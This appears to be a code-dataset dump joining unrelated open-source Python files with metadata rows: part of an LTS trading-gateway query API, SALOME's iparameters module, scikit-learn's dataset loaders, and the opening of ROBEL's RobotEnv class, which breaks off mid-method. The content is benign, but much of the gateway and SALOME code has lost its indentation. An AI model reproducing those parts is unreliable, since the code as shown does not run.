        # It is unclear whether this balance matches the account value shown in the KuaiQi terminal; needs testing
account.balance = data['Balance']
        # Push to gateway
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onRspQryBondInterest(self, data, error, n, last):
"""债券利息查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryMarketRationInfo(self, data, error, n, last):
"""市值配售查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryInstrumentCommissionRate(self, data, error, n, last):
"""合约手续费查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryETFInstrument(self, data, error, n, last):
"""ETF基金查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryETFBasket(self, data, error, n, last):
"""ETF股票篮查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryOFInstrument(self, data, error, n, last):
"""OF合约查询回报"""
pass
#----------------------------------------------------------------------
def onRspQrySFInstrument(self, data, error, n, last):
"""SF合约查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryInstrumentUnitMargin(self, data, error, n, last):
"""查询单手保证金"""
pass
#----------------------------------------------------------------------
def onRspQryPreDelivInfo(self, data, error, n , last):
"""查询预交割信息"""
pass
#----------------------------------------------------------------------
def onRsyQryCreditStockAssignInfo(self, data, error, n, last):
"""查询可融券分配"""
pass
#----------------------------------------------------------------------
def onRspQryCreditCashAssignInfo(self, data, error, n , last):
"""查询可融资分配"""
pass
#----------------------------------------------------------------------
def onRsyQryConversionRate(self, data, error, n, last):
"""查询证券这算率"""
pass
#----------------------------------------------------------------------
def onRspQryHisCreditDebtInfo(self,data, error, n, last):
"""查询历史信用负债"""
pass
#----------------------------------------------------------------------
def onRspQryMarketDataStaticInfo(self, data, error, n, last):
"""查询行情静态信息"""
pass
#----------------------------------------------------------------------
def onRspQryExpireRepurchInfo(self, data, error, n, last):
"""查询到期回购信息响应"""
pass
#----------------------------------------------------------------------
def onRspQryBondPledgeRate(self, data, error, n, last):
"""查询债券质押为标准券比例"""
pass
#----------------------------------------------------------------------
def onRspQryPledgeBond(self, data, error, n, last):
"""查询债券质押代码对照关系"""
pass
#----------------------------------------------------------------------
def onRspQryOrder(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTrade(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryInvestorPosition(self, data, error, n, last):
"""持仓查询回报"""
pos = VtPositionData()
pos.gatewayName = self.gatewayName
        # Save symbol
pos.symbol = data['InstrumentID']
pos.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
pos.vtSymbol = '.'.join([pos.symbol, pos.exchange])
        # Direction and frozen position volume
pos.direction = posiDirectionMapReverse.get(data['PosiDirection'], '')
if pos.direction == DIRECTION_NET or pos.direction == DIRECTION_LONG:
pos.frozen = data['LongFrozen']
elif pos.direction == DIRECTION_SHORT:
pos.frozen = data['ShortFrozen']
        # Position volume
pos.position = data['Position']
pos.ydPosition = data['YdPosition']
        # Average position price
if pos.position:
pos.price = data['OpenCost'] / pos.position
        # VT system position name
pos.vtPositionName = '.'.join([pos.vtSymbol, pos.direction])
        # Push to gateway
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def OnRspQryFundTransferSerial(self, data, error, n, last):
"""资金转账查询"""
pass
#----------------------------------------------------------------------
def onRspQryFundInterTransferSerial(self, data, error,n, last):
"""资金内转流水查询"""
pass
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address, productInfo, authCode):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
self.productInfo = productInfo
self.authCode = authCode
        # If the server connection has not been established yet, connect first
if not self.connectionStatus:
            # Create the API object on the C++ side; the argument is the folder path used to store the .con files
path = getTempPath(self.gatewayName + '_')
self.createFtdcQueryApi(path)
            # Register the server address
self.registerFront(self.address)
            # Initialize the connection; onFrontConnected is called on success
self.init()
        # If already connected but not yet logged in, log in now
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
req['UserProductInfo'] = self.productInfo
req['AuthCode'] = self.authCode
req['RandCode'] = self.randCode
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户"""
self.reqID += 1
        # Are InvestorID and BrokerID required here?
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryTradingAccount(req, self.reqID)
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
self.reqID += 1
req = {}
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqQryInvestorPosition(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
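#----------------------------------------------------------------------
# Illustrative connection sketch (added; not part of the original file). It assumes a
# gateway object exposing the onLog/onError/onContract/onAccount/onPosition callbacks
# used by the classes above; the account values and server address are placeholders.
def _example_qry_usage(gateway):
    """Minimal sketch: connect the query API, then poll account and positions."""
    qryApi = LtsQryApi(gateway)
    qryApi.connect(userID='demo', password='demo', brokerID='0000',
                   address='tcp://127.0.0.1:17001', productInfo='', authCode='')
    # After onRspUserLogin succeeds these can be polled periodically:
    qryApi.qryAccount()
    qryApi.qryPosition()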
| mit | 3,327,887,333,510,522,000 | 5,989,183,134,610,278,000 | 34.639001 | 92 | 0.447374 | false |
FedoraScientific/salome-kernel | src/KERNEL_PY/iparameters.py | 1 | 9144 | # -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2016 CEA/DEN, EDF R&D, OPEN CASCADE
#
# Copyright (C) 2003-2007 OPEN CASCADE, EADS/CCR, LIP6, CEA/DEN,
# CEDRAT, EDF R&D, LEG, PRINCIPIA R&D, BUREAU VERITAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
import salome
import string
import SALOME
import SALOMEDS
import SALOME_Session_idl
PT_INTEGER = 0
PT_REAL = 1
PT_BOOLEAN = 2
PT_STRING = 3
PT_REALARRAY = 4
PT_INTARRAY = 5
PT_STRARRAY = 6
_AP_LISTS_LIST_ = "AP_LISTS_LIST"
_AP_ENTRIES_LIST_ = "AP_ENTRIES_LIST"
_AP_PROPERTIES_LIST_ = "AP_PROPERTIES_LIST"
_AP_DUMP_PYTHON_ = "AP_DUMP_PYTHON"
vp_session = None
def getSession():
global vp_session
if vp_session is None:
vp_session = salome.naming_service.Resolve("/Kernel/Session")
vp_session = vp_session._narrow(SALOME.Session)
pass
return vp_session
class IParameters:
"""
Interface IParameters was designed to provide a common way to set up
named parameters. The interface is initialized by AttributeParameter that
is used as a container of stored data.
The interface supports 3 types of named parameters:
1. Named list - a named list consists of string values.
One can append value to list (method 'append'), get a number of values
in the list (method 'nbValues'), get all values of the given list
(method 'getValues') and get names of all created named lists.
2. Parameters - that is a set of named string values associated with some named
entity. Parameter consists of tree elements: entity name, a parameter name
and a parameter value. Thus for one named entity there are an arbitrary number
of pair 'name parameter : value'.
One can add a new parameter to entry (method 'setParameter'), get a value of
a given named parameter of the given entry (method 'getParameter'), get a number
of parameters of the given entry (method 'getNbParameters'), get all names of
parameters for the given entry (method 'getAllParameterNames'), get all
values of parameters for the entry (method 'getAllParameterValues') and get all
stored entries (method 'getEntries')
3. Property - a property has a name and a string value.
One can set property (method 'setProperty'), getProperty (method 'getProperty') and
get a list of all stored properties (method 'getProperties').
Note:
Methods not mentioned above are private and is not supposed to be used
by module's developers.
"""
def __init__(self, attributeParameter, clr=False):
"""Initializes the instance. If clr parameter is True, all IAPP attribute values are cleared."""
self._ap = attributeParameter
if ( clr ): self.clear()
pass
def clear(self):
"""Clear parameters"""
self._ap.Clear()
def append(self, listName, value):
"""Appends a value to the named list"""
if self._ap is None: return -1
v = []
if self._ap.IsSet(listName, PT_STRARRAY) == 0:
if self._ap.IsSet(_AP_LISTS_LIST_, PT_STRARRAY) == 0: self._ap.SetStrArray(_AP_LISTS_LIST_, v);
if listName != _AP_ENTRIES_LIST_ and listName != _AP_PROPERTIES_LIST_:
self.append(_AP_LISTS_LIST_, listName)
pass
self._ap.SetStrArray(listName, v)
pass
v = self._ap.GetStrArray(listName)
v.append(value)
self._ap.SetStrArray(listName, v)
return (len(v)-1)
def nbValues(self, listName):
"""Returns a number of values in the named list"""
if self._ap is None: return -1
if self._ap.IsSet(listName, PT_STRARRAY) == 0: return 0
v = self._ap.GetStrArray(listName)
return len(v)
def getValues(self, listName):
"""Returns a list of values in the named list"""
v = []
if self._ap is None: return v
if self._ap.IsSet(listName, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(listName)
def getLists(self):
"""Returns a list of named lists' names"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_LISTS_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_LISTS_LIST_)
def setParameter(self, entry, parameterName, value):
"""Sets a value of the named parameter for the entry"""
if self._ap is None: return
v = []
if self._ap.IsSet(entry, PT_STRARRAY) ==0:
self.append(_AP_ENTRIES_LIST_, entry) #Add the entry to the internal list of entries
self._ap.SetStrArray(entry, v)
pass
v = self._ap.GetStrArray(entry)
v.append(parameterName)
v.append(value)
self._ap.SetStrArray(entry, v)
pass
def getParameter(self, entry, parameterName):
"""Returns a value of the named parameter for the entry"""
if self._ap is None: return ""
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return ""
v = self._ap.GetStrArray(entry)
length = len(v);
i = 0
while i<length:
if v[i] == parameterName: return v[i+1]
i+=1
pass
return ""
def getAllParameterNames(self, entry):
"""Returns all parameter names of the given entry"""
v = []
names = []
if self._ap is None: return v
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return v
v = self._ap.GetStrArray(entry)
length = len(v)
i = 0
while i<length:
names.append(v[i])
i+=2
pass
return names
def getAllParameterValues(self, entry):
"""Returns all parameter values of the given entry"""
v = []
values = []
if self._ap is None: return v
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return v
v = self._ap.GetStrArray(entry)
length = len(v)
i = 1
while i<length:
            values.append(v[i])
i+=2
pass
return values
def getNbParameters(self, entry):
"""Returns a number of parameters of the entry"""
if self._ap is None: return -1
if self._ap.IsSet(entry, PT_STRARRAY) == 0: return -1
return len(self._ap.GetStrArray(entry))/2
def getEntries(self):
"""Returns all entries"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_ENTRIES_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_ENTRIES_LIST_)
def setProperty(self, name, value):
"""Sets a property value"""
if self._ap is None: return
if self._ap.IsSet(name, PT_STRING) == 0:
self.append(_AP_PROPERTIES_LIST_, name) #Add the property to the internal list of properties
pass
self._ap.SetString(name, value)
pass
def getProperty(self, name):
"""Returns a value of the named property"""
if self._ap is None: return ""
if self._ap.IsSet(name, PT_STRING) == 0: return ""
return self._ap.GetString(name)
def getProperties(self):
"""Returns all propetries"""
v = []
if self._ap is None: return v
if self._ap.IsSet(_AP_PROPERTIES_LIST_, PT_STRARRAY) == 0: return v
return self._ap.GetStrArray(_AP_PROPERTIES_LIST_)
def parseValue(self, value, separator, fromEnd):
"""Breaks a value string in two parts which is divided by separator."""
v = []
pos = - 1
if fromEnd == 1: pos = value.rfind(separator)
else: pos = value.find(separator)
if pos < 0:
v.append(value)
return v
part1 = value[0:pos]
part2 = value[pos+1:len(value)]
v.append(part1)
v.append(part2)
return v
def setDumpPython(self, isDumping):
"""Enables/Disables the dumping to Python"""
if self._ap is None: return
        self._ap.SetBool(_AP_DUMP_PYTHON_, isDumping)
pass
def isDumpPython(self):
"""Returns whether there is the dumping to Python"""
if self._ap is None: return 0
if self._ap.IsSet(_AP_DUMP_PYTHON_, PT_BOOLEAN) == 0: return 0
return self._ap.GetBool(_AP_DUMP_PYTHON_)
pass
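# Illustrative usage sketch (added; not part of the original module). It assumes an
# AttributeParameter already obtained from a SALOMEDS study; `attribute`, the list name,
# the entry string and the parameter names below are placeholders.
#
#   ipar = IParameters(attribute)
#   ipar.append("MyList", "value1")               # named list
#   ipar.setParameter("0:1:2", "Color", "red")    # per-entry parameter
#   ipar.setProperty("ViewMode", "Shading")       # global property
#   print ipar.getValues("MyList"), ipar.getParameter("0:1:2", "Color")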
| lgpl-2.1 | 9,083,918,216,155,791,000 | -7,290,831,093,832,906,000 | 34.858824 | 107 | 0.610127 | false |
vigilv/scikit-learn | sklearn/datasets/base.py | 196 | 18554 | """
Base IO code for all datasets
"""
# Copyright (c) 2007 David Cournapeau <[email protected]>
# 2010 Fabian Pedregosa <[email protected]>
# 2010 Olivier Grisel <[email protected]>
# License: BSD 3 clause
import os
import csv
import shutil
from os import environ
from os.path import dirname
from os.path import join
from os.path import exists
from os.path import expanduser
from os.path import isdir
from os import listdir
from os import makedirs
import numpy as np
from ..utils import check_random_state
class Bunch(dict):
"""Container object for datasets
Dictionary-like object that exposes its keys as attributes.
>>> b = Bunch(a=1, b=2)
>>> b['b']
2
>>> b.b
2
>>> b.a = 3
>>> b['a']
3
>>> b.c = 6
>>> b['c']
6
"""
def __init__(self, **kwargs):
dict.__init__(self, kwargs)
def __setattr__(self, key, value):
self[key] = value
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
def __getstate__(self):
return self.__dict__
def get_data_home(data_home=None):
"""Return the path of the scikit-learn data dir.
This folder is used by some large dataset loaders to avoid
downloading the data several times.
By default the data dir is set to a folder named 'scikit_learn_data'
in the user home folder.
Alternatively, it can be set by the 'SCIKIT_LEARN_DATA' environment
variable or programmatically by giving an explicit folder path. The
'~' symbol is expanded to the user home folder.
If the folder does not already exist, it is automatically created.
"""
if data_home is None:
data_home = environ.get('SCIKIT_LEARN_DATA',
join('~', 'scikit_learn_data'))
data_home = expanduser(data_home)
if not exists(data_home):
makedirs(data_home)
return data_home
def clear_data_home(data_home=None):
"""Delete all the content of the data home cache."""
data_home = get_data_home(data_home)
shutil.rmtree(data_home)
def load_files(container_path, description=None, categories=None,
load_content=True, shuffle=True, encoding=None,
decode_error='strict', random_state=0):
"""Load text files with categories as subfolder names.
Individual samples are assumed to be files stored a two levels folder
structure such as the following:
container_folder/
category_1_folder/
file_1.txt
file_2.txt
...
file_42.txt
category_2_folder/
file_43.txt
file_44.txt
...
The folder names are used as supervised signal label names. The
individual file names are not important.
This function does not try to extract features into a numpy array or
scipy sparse matrix. In addition, if load_content is false it
does not try to load the files in memory.
To use text files in a scikit-learn classification or clustering
algorithm, you will need to use the `sklearn.feature_extraction.text`
module to build a feature extraction transformer that suits your
problem.
If you set load_content=True, you should also specify the encoding of
the text using the 'encoding' parameter. For many modern text files,
'utf-8' will be the correct encoding. If you leave encoding equal to None,
then the content will be made of bytes instead of Unicode, and you will
not be able to use most functions in `sklearn.feature_extraction.text`.
Similar feature extractors should be built for other kind of unstructured
data input such as images, audio, video, ...
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
container_path : string or unicode
Path to the main folder holding one subfolder per category
description: string or unicode, optional (default=None)
A paragraph describing the characteristic of the dataset: its source,
reference, etc.
categories : A collection of strings or None, optional (default=None)
If None (default), load all the categories.
If not None, list of category names to load (other categories ignored).
load_content : boolean, optional (default=True)
Whether to load or not the content of the different files. If
true a 'data' attribute containing the text information is present
in the data structure returned. If not, a filenames attribute
gives the path to the files.
encoding : string or None (default is None)
If None, do not try to decode the content of the files (e.g. for
images or other non-text content).
If not None, encoding to use to decode text files to Unicode if
load_content is True.
decode_error: {'strict', 'ignore', 'replace'}, optional
Instruction on what to do if a byte sequence is given to analyze that
contains characters not of the given `encoding`. Passed as keyword
argument 'errors' to bytes.decode.
shuffle : bool, optional (default=True)
Whether or not to shuffle the data: might be important for models that
make the assumption that the samples are independent and identically
distributed (i.i.d.), such as stochastic gradient descent.
random_state : int, RandomState instance or None, optional (default=0)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are: either
data, the raw text data to learn, or 'filenames', the files
holding it, 'target', the classification labels (integer index),
'target_names', the meaning of the labels, and 'DESCR', the full
description of the dataset.
"""
target = []
target_names = []
filenames = []
folders = [f for f in sorted(listdir(container_path))
if isdir(join(container_path, f))]
if categories is not None:
folders = [f for f in folders if f in categories]
for label, folder in enumerate(folders):
target_names.append(folder)
folder_path = join(container_path, folder)
documents = [join(folder_path, d)
for d in sorted(listdir(folder_path))]
target.extend(len(documents) * [label])
filenames.extend(documents)
# convert to array for fancy indexing
filenames = np.array(filenames)
target = np.array(target)
if shuffle:
random_state = check_random_state(random_state)
indices = np.arange(filenames.shape[0])
random_state.shuffle(indices)
filenames = filenames[indices]
target = target[indices]
if load_content:
data = []
for filename in filenames:
with open(filename, 'rb') as f:
data.append(f.read())
if encoding is not None:
data = [d.decode(encoding, decode_error) for d in data]
return Bunch(data=data,
filenames=filenames,
target_names=target_names,
target=target,
DESCR=description)
return Bunch(filenames=filenames,
target_names=target_names,
target=target,
DESCR=description)
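# A minimal usage sketch for load_files (added; illustrative only -- the container path
# and the category folder names below are placeholders, nothing shipped with scikit-learn):
#
#     >>> dataset = load_files('/path/to/container', categories=['pos', 'neg'],
#     ...                      encoding='utf-8')                  # doctest: +SKIP
#     >>> len(dataset.data) == len(dataset.target)                # doctest: +SKIP
#     True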
def load_iris():
"""Load and return the iris dataset (classification).
The iris dataset is a classic and very easy multi-class classification
dataset.
================= ==============
Classes 3
Samples per class 50
Samples total 150
Dimensionality 4
Features real, positive
================= ==============
Read more in the :ref:`User Guide <datasets>`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the classification labels,
'target_names', the meaning of the labels, 'feature_names', the
meaning of the features, and 'DESCR', the
full description of the dataset.
Examples
--------
Let's say you are interested in the samples 10, 25, and 50, and want to
know their class name.
>>> from sklearn.datasets import load_iris
>>> data = load_iris()
>>> data.target[[10, 25, 50]]
array([0, 0, 1])
>>> list(data.target_names)
['setosa', 'versicolor', 'virginica']
"""
module_path = dirname(__file__)
with open(join(module_path, 'data', 'iris.csv')) as csv_file:
data_file = csv.reader(csv_file)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
target_names = np.array(temp[2:])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,), dtype=np.int)
for i, ir in enumerate(data_file):
data[i] = np.asarray(ir[:-1], dtype=np.float)
target[i] = np.asarray(ir[-1], dtype=np.int)
with open(join(module_path, 'descr', 'iris.rst')) as rst_file:
fdescr = rst_file.read()
return Bunch(data=data, target=target,
target_names=target_names,
DESCR=fdescr,
feature_names=['sepal length (cm)', 'sepal width (cm)',
'petal length (cm)', 'petal width (cm)'])
def load_digits(n_class=10):
"""Load and return the digits dataset (classification).
Each datapoint is a 8x8 image of a digit.
================= ==============
Classes 10
Samples per class ~180
Samples total 1797
Dimensionality 64
Features integers 0-16
================= ==============
Read more in the :ref:`User Guide <datasets>`.
Parameters
----------
n_class : integer, between 0 and 10, optional (default=10)
The number of classes to return.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'images', the images corresponding
to each sample, 'target', the classification labels for each
sample, 'target_names', the meaning of the labels, and 'DESCR',
the full description of the dataset.
Examples
--------
To load the data and visualize the images::
>>> from sklearn.datasets import load_digits
>>> digits = load_digits()
>>> print(digits.data.shape)
(1797, 64)
>>> import pylab as pl #doctest: +SKIP
>>> pl.gray() #doctest: +SKIP
>>> pl.matshow(digits.images[0]) #doctest: +SKIP
>>> pl.show() #doctest: +SKIP
"""
module_path = dirname(__file__)
data = np.loadtxt(join(module_path, 'data', 'digits.csv.gz'),
delimiter=',')
with open(join(module_path, 'descr', 'digits.rst')) as f:
descr = f.read()
target = data[:, -1]
flat_data = data[:, :-1]
images = flat_data.view()
images.shape = (-1, 8, 8)
if n_class < 10:
idx = target < n_class
flat_data, target = flat_data[idx], target[idx]
images = images[idx]
return Bunch(data=flat_data,
target=target.astype(np.int),
target_names=np.arange(10),
images=images,
DESCR=descr)
def load_diabetes():
"""Load and return the diabetes dataset (regression).
============== ==================
Samples total 442
Dimensionality 10
Features real, -.2 < x < .2
Targets integer 25 - 346
============== ==================
Read more in the :ref:`User Guide <datasets>`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn and 'target', the regression target for each
sample.
"""
base_dir = join(dirname(__file__), 'data')
data = np.loadtxt(join(base_dir, 'diabetes_data.csv.gz'))
target = np.loadtxt(join(base_dir, 'diabetes_target.csv.gz'))
return Bunch(data=data, target=target)
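# Illustrative example for load_diabetes (added; shapes follow the table above):
#
#     >>> diabetes = load_diabetes()
#     >>> diabetes.data.shape, diabetes.target.shape
#     ((442, 10), (442,))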
def load_linnerud():
"""Load and return the linnerud dataset (multivariate regression).
Samples total: 20
Dimensionality: 3 for both data and targets
Features: integer
Targets: integer
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are: 'data' and
'targets', the two multivariate datasets, with 'data' corresponding to
the exercise and 'targets' corresponding to the physiological
measurements, as well as 'feature_names' and 'target_names'.
"""
base_dir = join(dirname(__file__), 'data/')
# Read data
data_exercise = np.loadtxt(base_dir + 'linnerud_exercise.csv', skiprows=1)
data_physiological = np.loadtxt(base_dir + 'linnerud_physiological.csv',
skiprows=1)
# Read header
with open(base_dir + 'linnerud_exercise.csv') as f:
header_exercise = f.readline().split()
with open(base_dir + 'linnerud_physiological.csv') as f:
header_physiological = f.readline().split()
with open(dirname(__file__) + '/descr/linnerud.rst') as f:
descr = f.read()
return Bunch(data=data_exercise, feature_names=header_exercise,
target=data_physiological,
target_names=header_physiological,
DESCR=descr)
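# Illustrative example for load_linnerud (added; 20 samples with 3 exercise features
# and 3 physiological targets, as documented above):
#
#     >>> linnerud = load_linnerud()
#     >>> linnerud.data.shape, linnerud.target.shape
#     ((20, 3), (20, 3))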
def load_boston():
"""Load and return the boston house-prices dataset (regression).
============== ==============
Samples total 506
Dimensionality 13
Features real, positive
Targets real 5. - 50.
============== ==============
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the regression targets,
and 'DESCR', the full description of the dataset.
Examples
--------
>>> from sklearn.datasets import load_boston
>>> boston = load_boston()
>>> print(boston.data.shape)
(506, 13)
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'boston_house_prices.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'boston_house_prices.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,))
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float)
target[i] = np.asarray(d[-1], dtype=np.float)
return Bunch(data=data,
target=target,
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text)
def load_sample_images():
"""Load sample images for image manipulation.
Loads both, ``china`` and ``flower``.
Returns
-------
data : Bunch
Dictionary-like object with the following attributes :
'images', the two sample images, 'filenames', the file
names for the images, and 'DESCR'
the full description of the dataset.
Examples
--------
To load the data and visualize the images:
>>> from sklearn.datasets import load_sample_images
>>> dataset = load_sample_images() #doctest: +SKIP
>>> len(dataset.images) #doctest: +SKIP
2
>>> first_img_data = dataset.images[0] #doctest: +SKIP
>>> first_img_data.shape #doctest: +SKIP
(427, 640, 3)
>>> first_img_data.dtype #doctest: +SKIP
dtype('uint8')
"""
# Try to import imread from scipy. We do this lazily here to prevent
# this module from depending on PIL.
try:
try:
from scipy.misc import imread
except ImportError:
from scipy.misc.pilutil import imread
except ImportError:
raise ImportError("The Python Imaging Library (PIL) "
"is required to load data from jpeg files")
module_path = join(dirname(__file__), "images")
with open(join(module_path, 'README.txt')) as f:
descr = f.read()
filenames = [join(module_path, filename)
for filename in os.listdir(module_path)
if filename.endswith(".jpg")]
# Load image data for each image in the source folder.
images = [imread(filename) for filename in filenames]
return Bunch(images=images,
filenames=filenames,
DESCR=descr)
def load_sample_image(image_name):
"""Load the numpy array of a single sample image
Parameters
-----------
image_name: {`china.jpg`, `flower.jpg`}
The name of the sample image loaded
Returns
-------
img: 3D array
The image as a numpy array: height x width x color
Examples
---------
>>> from sklearn.datasets import load_sample_image
>>> china = load_sample_image('china.jpg') # doctest: +SKIP
>>> china.dtype # doctest: +SKIP
dtype('uint8')
>>> china.shape # doctest: +SKIP
(427, 640, 3)
>>> flower = load_sample_image('flower.jpg') # doctest: +SKIP
>>> flower.dtype # doctest: +SKIP
dtype('uint8')
>>> flower.shape # doctest: +SKIP
(427, 640, 3)
"""
images = load_sample_images()
index = None
for i, filename in enumerate(images.filenames):
if filename.endswith(image_name):
index = i
break
if index is None:
raise AttributeError("Cannot find sample image: %s" % image_name)
return images.images[index]
| bsd-3-clause | -3,529,114,218,763,045,000 | -802,746,523,009,800,400 | 32.430631 | 79 | 0.588876 | false |
google-research/robel | robel/robot_env.py | 1 | 21356 | # Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base environment API for robotics tasks."""
import abc
import collections
from typing import Any, Dict, Optional, Sequence, Union, Tuple
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
from robel.components.builder import ComponentBuilder
from robel.simulation.sim_scene import SimScene, SimBackend
from robel.simulation.renderer import RenderMode
DEFAULT_RENDER_SIZE = 480
# The simulation backend to use by default.
DEFAULT_SIM_BACKEND = SimBackend.MUJOCO_PY
def make_box_space(low: Union[float, Sequence[float]],
high: Union[float, Sequence[float]],
shape: Optional[Tuple[int]] = None) -> gym.spaces.Box:
"""Returns a Box gym space."""
# HACK: Fallback for gym 0.9.x
# TODO(michaelahn): Consider whether we still need to support 0.9.x
try:
return spaces.Box(low, high, shape, dtype=np.float32)
except TypeError:
return spaces.Box(low, high, shape)
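# Small usage sketch (added; illustrative): the helper exists so the same call works on
# gym versions with and without the `dtype` argument of spaces.Box.
#
#     action_space = make_box_space(-1.0, 1.0, shape=(9,))
#     observation_space = make_box_space(-np.inf, np.inf, shape=(32,))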
class RobotEnv(gym.Env, metaclass=abc.ABCMeta):
"""Base Gym environment for robotics tasks."""
def __init__(self,
sim_model: Any,
observation_keys: Optional[Sequence[str]] = None,
reward_keys: Optional[Sequence[str]] = None,
use_dict_obs: bool = False,
frame_skip: int = 1,
camera_settings: Optional[Dict] = None,
sim_backend: SimBackend = DEFAULT_SIM_BACKEND,
sticky_action_probability: float = 0.):
"""Initializes a robotics environment.
Args:
sim_model: The path to the simulation to load.
observation_keys: The keys of `get_obs_dict` to extract and flatten
for the default implementation of `_get_obs`. If this is not
set, `get_obs_dict` must return an OrderedDict.
reward_keys: The keys of `get_reward_dict` to extract and sum for
the default implementation of `_get_total_reward`. If this is
not set, `_get_total_reward` will sum all of the values.
use_dict_obs: If True, the observations will be returned as
dictionaries rather than as a flattened array. The observation
space of this environment will be a dictionary space.
frame_skip: The number of simulation steps per environment step.
This multiplied by the timestep defined in the model file is the
step duration.
camera_settings: Settings to apply to the free camera in simulation.
sim_backend: The simulation backend to use.
sticky_action_probability: Repeat previous action with this
probability. Default is 0 (no sticky actions).
"""
self._observation_keys = observation_keys
self._reward_keys = reward_keys
self._use_dict_obs = use_dict_obs
self._sticky_action_probability = sticky_action_probability
self._components = []
# The following spaces are initialized by their respective `initialize`
# methods, e.g. `_initialize_observation_space`.
self._observation_space = None
self._action_space = None
self._state_space = None
# The following are populated by step() and/or reset().
self.last_action = None
self.last_obs_dict = None
self.last_reward_dict = None
self.last_score_dict = None
self.is_done = False
self.step_count = 0
# Load the simulation.
self.sim_scene = SimScene.create(
sim_model, backend=sim_backend, frame_skip=frame_skip)
self.sim = self.sim_scene.sim
self.model = self.sim_scene.model
self.data = self.sim_scene.data
if camera_settings:
self.sim_scene.renderer.set_free_camera_settings(**camera_settings)
# Set common metadata for Gym environments.
self.metadata = {
'render.modes': ['human', 'rgb_array', 'depth_array'],
'video.frames_per_second': int(
np.round(1.0 / self.sim_scene.step_duration))
}
# Ensure gym does not try to patch `_step` and `_reset`.
self._gym_disable_underscore_compat = True
self.seed()
#===========================================================================
# Environment API.
# These methods should not be overridden by subclasses.
#===========================================================================
@property
def observation_space(self) -> gym.Space:
"""Returns the observation space of the environment.
The observation space is the return specification for `reset`,
`_get_obs`, and the first element of the returned tuple from `step`.
Subclasses should override `_initialize_observation_space` to customize
the observation space.
"""
# Initialize and cache the observation space on the first call.
if self._observation_space is None:
self._observation_space = self._initialize_observation_space()
assert self._observation_space is not None
return self._observation_space
@property
def action_space(self) -> gym.Space:
"""Returns the action space of the environment.
        The action space is the argument specification for `step`.
Subclasses should override `_initialize_action_space` to customize the
action space.
"""
# Initialize and cache the action space on the first call.
if self._action_space is None:
